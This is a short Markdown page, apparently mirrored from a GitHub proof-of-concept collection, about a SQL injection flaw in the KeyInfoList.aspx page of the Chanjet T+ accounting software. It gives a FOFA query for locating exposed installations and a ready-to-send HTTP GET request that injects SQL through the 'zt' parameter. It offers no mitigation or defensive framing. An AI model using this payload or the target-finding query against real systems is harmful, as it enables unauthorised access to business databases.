mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-05-05 10:17:57 +00:00
17 lines
349 B
Markdown
17 lines
349 B
Markdown
|
## 畅捷通TPlus-KeyInfoList.aspx存在SQL注入漏洞
|
||
|
|
|
||
|
|
|
||
|
|
## fofa
|
||
|
|
```
|
||
|
|
app="畅捷通-TPlus"
|
||
|
|
```
|
||
|
|
|
||
|
|
## poc
|
||
|
|
```
|
||
|
|
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','1')))--+ HTTP/1.1
|
||
|
|
Host: 127.0.0.1
|
||
|
|
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
|
||
|
|
Accept: */*
|
||
|
|
Connection: Keep-Alive
|
||
|
|
```
|